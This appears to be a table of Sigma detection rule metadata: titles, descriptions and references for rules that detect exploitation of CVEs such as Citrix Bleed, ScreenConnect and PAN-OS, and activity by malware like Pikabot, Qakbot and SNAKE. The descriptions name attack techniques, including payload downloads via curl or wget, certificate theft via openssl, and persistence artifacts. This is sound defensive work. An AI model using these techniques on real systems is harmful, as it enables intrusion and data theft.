https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967, https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966, https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/, https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966, https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966 |
CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy |
Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs. |
https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967, https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966, https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/, https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966, https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966 |
CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver |
Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs. |
https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967, https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966, https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/, https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966, https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966 |
CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver |
Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs by looking for a very long host header string. |
https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967, https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966, https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/, https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966, https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966 |
Potential Exploitation Attempt Of Undocumented WindowsServer RCE |
Detects potential exploitation attempts of an undocumented Windows Server pre-auth remote code execution (RCE) |
https://github.com/SigmaHQ/sigma/pull/3946, https://twitter.com/hackerfantastic/status/1616455335203438592?s=20 |
Potential SocGholish Second Stage C2 DNS Query |
Detects a DNS query initiated from a "wscript" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic |
https://www.virustotal.com/gui/file/0e2854753d17b1bb534de8e765d5813c9fb584a745978b3d92bc6ca78e3e7735/relations, https://www.virustotal.com/gui/file/d5661009c461a8b20e1ad22f48609cc84dd90aee9182e026659dde4d46aaf25e/relations, https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update |
Potential COLDSTEEL RAT File Indicators |
Detects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" directory. Seen being used by the COLDSTEEL RAT in some of its variants. |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf |
Potential COLDSTEEL Persistence Service DLL Creation |
Detects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf |
Potential COLDSTEEL Persistence Service DLL Load |
Detects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name have been seen used by ColdSteel as the service DLL for its persistence mechanism
|
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf |
COLDSTEEL RAT Anonymous User Process Execution |
Detects the creation of a process executing as a user called "ANONYMOUS", seen used by the "MileStone2016" variant of COLDSTEEL |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf |
COLDSTEEL RAT Cleanup Command Execution |
Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf |
COLDSTEEL RAT Service Persistence Execution |
Detects the creation of an "svchost" process with specific command line flags that were seen present and used by ColdSteel RAT |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf |
Potential COLDSTEEL RAT Windows User Creation |
Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT. |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf |
COLDSTEEL Persistence Service Creation |
Detects the creation of new services potentially related to COLDSTEEL RAT |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf |
DarkGate - Autoit3.EXE File Creation By Uncommon Process |
Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe.
This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs
process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other
processes constitute non-standard and suspicious ways to retrieve the Autoit3 executable.
|
https://github.security.telekom.com/2023/08/darkgate-loader.html, https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware, https://github.com/pr0xylife/DarkGate/tree/main |
DarkGate - Autoit3.EXE Execution Parameters |
Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within
the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate
command-and-control server.
|
https://github.security.telekom.com/2023/08/darkgate-loader.html, https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware, https://github.com/pr0xylife/DarkGate/tree/main |
DarkGate - User Created Via Net.EXE |
Detects creation of local users via the net.exe command with the name of "DarkGate" |
Internal Research |
Griffon Malware Attack Pattern |
Detects process execution patterns related to Griffon malware as reported by Kaspersky |
https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/ |
Injected Browser Process Spawning Rundll32 - GuLoader Activity |
Detects the execution of installed GuLoader malware on the host.
GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent (injected) process.
|
Internal Research |
IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32 |
Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID |
https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/, https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ |
Potential Pikabot C2 Activity |
Detects the execution of rundll32 that leads to an external network connection.
The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries.
|
https://www.virustotal.com/gui/file/d72af640b71b8e3eca3eba660dd7c7f029ff8852bcacaa379e7b6c57cf4d9b44, https://www.virustotal.com/gui/file/6bb4cdbaef03b732a93559a58173e7f16b29bfb159a1065fae9185000ff23b4b, https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_06.12.2023.txt |
Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE |
Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads.
Commands such as "curl" and "wget" are used to download extra payloads, "ping" and "timeout" are abused to introduce delays in the command execution, and "Rundll32" is used to execute malicious DLL files.
In the observed Pikabot infections, a combination of the commands described above is used to orchestrate the download and execution of malicious DLL files.
|
https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_30.10.2023.txt, https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_22.12.2023.txt |
Potential Pikabot Discovery Activity |
Detects system discovery activity carried out by Pikabot, including network, user info and domain groups.
The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).
|
https://www.virustotal.com/gui/file/72f1a5476a845ea02344c9b7edecfe399f64b52409229edaf856fcb9535e3242, https://tria.ge/231023-lpw85she57/behavioral2 |
Potential Pikabot Hollowing Activity |
Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries.
The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries.
|
https://www.virustotal.com/gui/file/b6e8910fb9b3bb1fcddefd35ff0ed8624930d30d6977e11808c8330415685a62, https://www.virustotal.com/gui/file/6bb4cdbaef03b732a93559a58173e7f16b29bfb159a1065fae9185000ff23b4b, https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_06.12.2023.txt |
Pikabot Fake DLL Extension Execution Via Rundll32.EXE |
Detects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity.
|
https://github.com/pr0xylife/Pikabot, https://tria.ge/231004-tp8k6sch9t/behavioral2, https://www.virustotal.com/gui/file/56db0c4842a63234ab7fe2dda6eeb63aa7bb68f9a456985b519122f74dea37e2/behavior, https://tria.ge/231212-r1bpgaefar/behavioral2 |
Qakbot Regsvr32 Calc Pattern |
Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot |
https://github.com/pr0xylife/Qakbot/ |
Potential Qakbot Rundll32 Execution |
Detects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity. |
https://github.com/pr0xylife/Qakbot/ |
Qakbot Rundll32 Exports Execution |
Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity. |
https://github.com/pr0xylife/Qakbot/ |
Qakbot Rundll32 Fake DLL Extension Execution |
Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity. |
https://github.com/pr0xylife/Qakbot/ |
Qakbot Uninstaller Execution |
Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet |
https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources, https://www.virustotal.com/gui/file/7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117/community, https://www.virustotal.com/gui/file/fab408536aa37c4abc8be97ab9c1f86cb33b63923d423fdc2859eb9d63fa8ea0/community |
Rhadamanthys Stealer Module Launch Via Rundll32.EXE |
Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023 |
https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88, https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/, https://www.joesandbox.com/analysis/790122/0/html, https://twitter.com/anfam17/status/1607477672057208835 |
Rorschach Ransomware Execution Activity |
Detects Rorschach ransomware execution activity |
https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/ |
SNAKE Malware Kernel Driver File Indicator |
Detects SNAKE malware kernel driver file indicator |
https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF |
SNAKE Malware WerFault Persistence File Creation |
Detects the creation of a file named "WerFault.exe" in the WinSxS directory by a non-system process, which can be indicative of potential SNAKE malware activity |
https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF |
SNAKE Malware Installer Name Indicators |
Detects filename indicators associated with the SNAKE malware as reported by CISA in their report |
https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF |
Potential SNAKE Malware Installation CLI Arguments Indicator |
Detects a specific command-line argument sequence seen used by SNAKE malware during its installation as described by CISA in their report |
https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF |
Potential SNAKE Malware Installation Binary Indicator |
Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report |
https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF |
Potential SNAKE Malware Persistence Service Execution |
Detects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" directory as a service. This could be indicative of potential SNAKE malware activity as reported by CISA. |
https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF |
SNAKE Malware Covert Store Registry Key |
Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA |
https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF |
Potential Encrypted Registry Blob Related To SNAKE Malware |
Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA |
https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF |
SNAKE Malware Service Persistence |
Detects the creation of a service named "WerFaultSvc" which seems to be used by the SNAKE malware as a persistence mechanism as described by CISA in their report |
https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF |
Ursnif Redirection Of Discovery Commands |
Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware.
|
Internal Research |
Potential Compromised 3CXDesktopApp Beaconing Activity - DNS |
Detects potential beaconing activity to domains related to the 3CX 3CXDesktopApp compromise |
https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ |
Malicious DLL Load By Compromised 3CXDesktopApp |
Detects DLL load activity of known compromised DLLs used by the compromised 3CXDesktopApp |
https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/ |
Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon |
Detects potential beaconing activity to domains related to the 3CX 3CXDesktopApp compromise |
https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ |
Potential Compromised 3CXDesktopApp Execution |
Detects execution of a known compromised version of 3CXDesktopApp |
https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ |
Potential Suspicious Child Process Of 3CXDesktopApp |
Detects potentially suspicious child processes of "3CXDesktopApp.exe", which could be related to the 3CXDesktopApp supply chain compromise |
https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/, https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/ |
Potential Compromised 3CXDesktopApp Update Activity |
Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software |
https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/, https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats |
Potential Compromised 3CXDesktopApp Beaconing Activity - Proxy |
Detects potential beaconing activity to domains related to the 3CX 3CXDesktopApp compromise |
https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ |
DLL Names Used By SVR For GraphicalProton Backdoor |
Hunts known SVR-specific DLL names. |
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a |
Potential Compromised 3CXDesktopApp ICO C2 File Download |
Detects potential malicious .ICO file downloads from a compromised 3CXDesktopApp via web requests to the malicious GitHub repository |
https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/, https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/ |
Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor |
Hunts for known SVR-specific scheduled task names |
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a |
Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task Scheduler |
Hunts for known SVR-specific scheduled task names |
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a |
Diamond Sleet APT DNS Communication Indicators |
Detects DNS queries related to Diamond Sleet APT activity |
https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ |
Diamond Sleet APT File Creation Indicators |
Detects file creation activity that is related to Diamond Sleet APT activity |
https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ |
Diamond Sleet APT DLL Sideloading Indicators |
Detects DLL sideloading activity seen used by Diamond Sleet APT |
https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ |
Diamond Sleet APT Process Activity Indicators |
Detects process creation activity indicators related to Diamond Sleet APT |
https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ |
Diamond Sleet APT Scheduled Task Creation - Registry |
Detects a registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of the TeamCity CVE-2023-42793 vulnerability
|
https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ |
Diamond Sleet APT Scheduled Task Creation |
Detects a registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of the TeamCity CVE-2023-42793 vulnerability
|
https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ |
Potential Operation Triangulation C2 Beaconing Activity - DNS |
Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB |
https://securelist.com/operation-triangulation/109842/, https://www-fsb-ru.translate.goog/fsb/press/message/single.htm!id=10439739@fsbMessage.html?_x_tr_sch=http&_x_tr_sl=ru&_x_tr_tl=en&_x_tr_hl=de&_x_tr_pto=wapp |
Potential Operation Triangulation C2 Beaconing Activity - Proxy |
Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB |
https://securelist.com/operation-triangulation/109842/, https://www-fsb-ru.translate.goog/fsb/press/message/single.htm!id=10439739@fsbMessage.html?_x_tr_sch=http&_x_tr_sl=ru&_x_tr_tl=en&_x_tr_hl=de&_x_tr_pto=wapp |
Potential APT FIN7 Related PowerShell Script Created |
Detects PowerShell script file creation with a specific name or suffix which was seen being used often by FIN7 PowerShell scripts |
https://labs.withsecure.com/publications/fin7-target-veeam-servers |
Potential APT FIN7 POWERHOLD Execution |
Detects execution of the POWERHOLD script seen used by FIN7 as reported by WithSecureLabs |
https://labs.withsecure.com/publications/fin7-target-veeam-servers |
Potential POWERTRASH Script Execution |
Detects potential execution of the PowerShell script POWERTRASH |
https://labs.withsecure.com/publications/fin7-target-veeam-servers |
Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity |
Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution |
https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://labs.withsecure.com/publications/fin7-target-veeam-servers/jcr:content/root/responsivegrid/responsivegrid/responsivegrid/image_253944286.img.png/1682500394900.png, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv |
Lace Tempest File Indicators |
Detects PowerShell script file creation with specific names or suffixes which were seen being used often in PowerShell scripts by FIN7 |
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification |
Lace Tempest PowerShell Evidence Eraser |
Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team
|
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification |
Lace Tempest PowerShell Launcher |
Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team
|
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification |
Lace Tempest Cobalt Strike Download |
Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team |
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification |
Lace Tempest Malware Loader Execution |
Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team |
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification |
Lazarus APT DLL Sideloading Activity |
Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company |
https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/, https://www.bleepingcomputer.com/news/security/lazarus-hackers-breach-aerospace-firm-with-new-lightlesscan-malware/ |
Mint Sandstorm - AsperaFaspex Suspicious Process Execution |
Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm |
https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/ |
Mint Sandstorm - Log4J Wstomcat Process Execution |
Detects Log4J Wstomcat process execution as seen in Mint Sandstorm activity |
https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/ |
Mint Sandstorm - ManageEngine Suspicious Process Execution |
Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm |
https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/ |
Potential APT Mustang Panda Activity Against Australian Gov |
Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52 |
https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/ |
Okta 2023 Breach Indicator Of Compromise |
Detects new user account creation or activation with specific names related to the Okta Support System 2023 breach.
This rule can be enhanced by filtering out known and legitimate usernames used in your environment.
|
https://www.beyondtrust.com/blog/entry/okta-support-unit-breach, https://developer.okta.com/docs/reference/api/event-types/ |
Onyx Sleet APT File Creation Indicators |
Detects file creation activity that is related to Onyx Sleet APT activity |
https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ |
PaperCut MF/NG Exploitation Related Indicators |
Detects exploitation indicators related to PaperCut MF/NG Exploitation |
https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software, https://www.papercut.com/kb/Main/PO-1216-and-PO-1219 |
PaperCut MF/NG Potential Exploitation |
Detects suspicious child processes of "pc-app.exe", which could indicate potential exploitation of PaperCut |
https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software, https://github.com/huntresslabs/threat-intel/blob/main/2023/2023-04/20-PaperCut/win_susp_papercut_code_execution.yml |
Peach Sandstorm APT Process Activity Indicators |
Detects process creation activity related to Peach Sandstorm APT |
https://twitter.com/MsftSecIntel/status/1737895710169628824, https://www.virustotal.com/gui/file/364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614/details |
Potential Peach Sandstorm APT C2 Communication Activity |
Detects potential C2 communication activity related to Peach Sandstorm APT |
https://twitter.com/MsftSecIntel/status/1737895710169628824, https://www.virustotal.com/gui/file/364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614/details |
UNC4841 - Email Exfiltration File Pattern |
Detects filename pattern of email related data used by UNC4841 for staging and exfiltration |
https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally |
UNC4841 - Barracuda ESG Exploitation Indicators |
Detects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation. |
https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally |
UNC4841 - SSL Certificate Exfiltration Via Openssl |
Detects the execution of "openssl" to connect to an IP address. This technique was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command. |
https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally |
UNC4841 - Download Compressed Files From Temp.sh Using Wget |
Detects execution of "wget" to download ".zip" or ".rar" files from "temp.sh", as seen used by UNC4841 during their Barracuda ESG zero day exploitation. |
https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally |
UNC4841 - Download Tar File From Untrusted Direct IP Via Wget |
Detects execution of "wget" to download a "tar" file from an IP address that doesn't have a trusted certificate, as seen used by UNC4841 during their Barracuda ESG zero day exploitation. |
https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally |
UNC4841 - Potential SEASPY Execution |
Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor |
https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally |
CVE-2024-1212 Exploitation - Progress Kemp LoadMaster Unauthenticated Command Injection |
Detects potential exploitation of CVE-2024-1709, an unauthenticated command injection in Progress Kemp LoadMaster.
It looks for GET requests to '/access/set' API with the parameters 'param=enableapi' and 'value=1' as well as an "Authorization" header with a base64 encoded value with an uncommon character.
|
https://github.com/RhinoSecurityLabs/CVEs/blob/15cf4d86c83daa57b59eaa2542a0ed47ad3dc32d/CVE-2024-1212/CVE-2024-1212.py, https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/ |
CVE-2024-1708 - ScreenConnect Path Traversal Exploitation |
This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.
|
https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8, https://www.cve.org/CVERecord?id=CVE-2024-1709, https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass |
CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - Security |
This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.
This requires an Advanced Auditing policy that logs successful Windows Event ID 4663 events, with a SACL set on the directory.
|
https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8, https://www.cve.org/CVERecord?id=CVE-2024-1708, https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass |
ScreenConnect User Database Modification |
Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.
This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
|
https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8, https://www.cve.org/CVERecord?id=CVE-2024-1709, https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass |
CVE-2024-1709 - ScreenConnect Authentication Bypass Exploitation |
Detects GET requests to '/SetupWizard.aspx/[anythinghere]' that indicate exploitation of the ScreenConnect vulnerability CVE-2024-1709.
|
https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8, https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass, https://www.cve.org/CVERecord?id=CVE-2024-1709 |
ScreenConnect User Database Modification - Security |
This detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.
This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
This requires an Advanced Auditing policy that logs successful Windows Event ID 4663 events, with a SACL set on the directory.
|
https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8, https://www.cve.org/CVERecord?id=CVE-2024-1709, https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass |
Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process |
Detects a potentially suspicious child process of the SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094.
|
https://github.com/amlweems/xzbot?tab=readme-ov-file#backdoor-demo |
Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation |
Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled.
As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function.
|
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/, https://nvd.nist.gov/vuln/detail/CVE-2024-3400 |
Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection |
Detects potential exploitation attempts of CVE-2024-3400 - an OS command injection in Palo Alto GlobalProtect.
This detection looks for suspicious strings that indicate a potential directory traversal attempt or command injection.
|
